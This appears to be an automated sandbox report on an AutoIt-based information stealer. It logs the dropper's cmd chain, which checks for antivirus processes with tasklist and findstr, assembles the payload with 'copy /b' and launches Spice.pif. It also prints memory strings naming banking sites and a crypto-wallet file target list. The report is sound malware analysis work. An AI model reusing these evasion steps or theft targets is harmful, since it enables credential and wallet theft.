                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00ED4005
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00ED494A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00EDC2FF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00EDCD9F
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDCD14 FindFirstFileW,FindClose,11_2_00EDCD14
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00EDF5D8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00EDF735
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00EDFA36
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00ED3CE2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E85D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00E85D13
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: HCAEGCBF.11.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: discord.comVMware20,11696494690f
                Source: HCAEGCBF.11.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: HCAEGCBF.11.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: HCAEGCBF.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: HCAEGCBF.11.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: HCAEGCBF.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: HCAEGCBF.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: HCAEGCBF.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: HCAEGCBF.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: HCAEGCBF.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: HCAEGCBF.11.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: HCAEGCBF.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 0dN59ZIkEM.exe, 00000000.00000002.1451330319.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\F
                Source: HCAEGCBF.11.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: HCAEGCBF.11.drBinary or memory string: global block list test formVMware20,11696494690
                Source: Spice.pif, 0000000B.00000002.2621300072.00000000017D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: HCAEGCBF.11.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: HCAEGCBF.11.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: HCAEGCBF.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: HCAEGCBF.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: HCAEGCBF.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: HCAEGCBF.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: HCAEGCBF.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeAPI call chain: ExitProcess graph end nodegraph_0-3663
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifAPI call chain: ExitProcess graph end nodegraph_11-98166
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifAPI call chain: ExitProcess graph end nodegraph_11-98240
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE45D5 BlockInput,11_2_00EE45D5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E85240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E85240
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00EA5CAC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EEC6D9 LoadLibraryA,GetProcAddress,11_2_00EEC6D9
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00EC88CD
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00E9A385
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9A354 SetUnhandledExceptionFilter,11_2_00E9A354
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC9369 LogonUserW,11_2_00EC9369
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E85240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E85240
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED1AC6 SendInput,keybd_event,11_2_00ED1AC6
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED51E2 mouse_event,11_2_00ED51E2
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00EC88CD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00ED4F1C
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Spice.pifBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9885B cpuid 11_2_00E9885B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EB0030 GetLocalTime,__swprintf,11_2_00EB0030
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EB0722 GetUserNameW,11_2_00EB0722
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00EA416A
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620838284.00000000015DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 11.2.Spice.pif.4810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 